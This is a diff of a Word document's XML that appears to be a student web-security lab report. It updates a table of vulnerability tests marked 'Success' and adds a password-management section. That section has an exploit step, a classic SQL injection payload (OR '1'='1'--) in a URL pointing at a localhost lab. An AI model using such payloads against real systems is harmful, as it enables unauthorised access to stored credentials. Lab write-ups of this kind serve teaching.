             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>DOM-Based XSS</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -469,24 +778,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -494,8 +811,36 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>Sesssion Management #1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -504,24 +849,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -529,8 +882,36 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>Sesssion Management #1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -539,24 +920,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -564,8 +953,36 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>Sesssion Management #1</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -574,24 +991,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -599,8 +1024,36 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>Password Storage</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -609,24 +1062,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -634,8 +1095,36 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>XML External Entity</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -644,24 +1133,32 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -669,8 +1166,36 @@
         <w:tc>
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
-            <w:tcW w:w="3008" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+              <w:t>SQL Injection</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Titre20"/>
+              <w:rPr>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
+          </w:p>
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Titre20"/>
@@ -679,27 +1204,36 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3009" w:type="dxa"/>
+            <w:tcW w:w="3006" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Titre20"/>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
+            <w:r>
+              <w:t>Success</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
+      <w:bookmarkEnd w:id="0"/>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -708,20 +1242,111 @@
       </w:pPr>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre2"/>
-      </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Password management </w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="1"/>
+      </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B2FB9E7">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-726012</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>298273</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="7367905" cy="3782060"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="1" name="Image 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="7367905" cy="3782060"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Visit </w:t>
+      </w:r>
       <w:hyperlink r:id="rId10" w:history="1">
         <w:r>
           <w:rPr>
@@ -733,26 +1358,89 @@
           <w:rPr>
             <w:rStyle w:val="Lienhypertexte"/>
           </w:rPr>
-          <w:t>ttps://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</w:t>
+          <w:t>ttp://127.0.0.1/Password%20Management/attack/?username=</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>xxx</w:t>
         </w:r>
       </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> OR ‘1’=’1’—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7608C8B6" wp14:editId="60CDECE9">
+            <wp:extent cx="5133975" cy="247650"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="34" name="Image 34"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5133975" cy="247650"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Password is not hashed</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre20"/>
-        <w:jc w:val="left"/>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId11"/>
+      <w:headerReference w:type="default" r:id="rId12"/>
       <w:footnotePr>
         <w:pos w:val="beneathText"/>
       </w:footnotePr>
@@ -817,6 +1505,25 @@
     </w:p>
     <w:p/>
   </w:footnote>
+  <w:footnote w:id="1">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> h</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ttps://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
 </w:footnotes>
 </file>
 
@@ -841,6 +1548,7 @@
         <w15:appearance w15:val="hidden"/>
         <w:text/>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:r>
           <w:rPr>
@@ -1105,6 +1813,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="01136C85"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EB28E79E"/>
+    <w:lvl w:ilvl="0" w:tplc="040C000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040C0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040C001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040C000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040C0019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040C001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040C000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
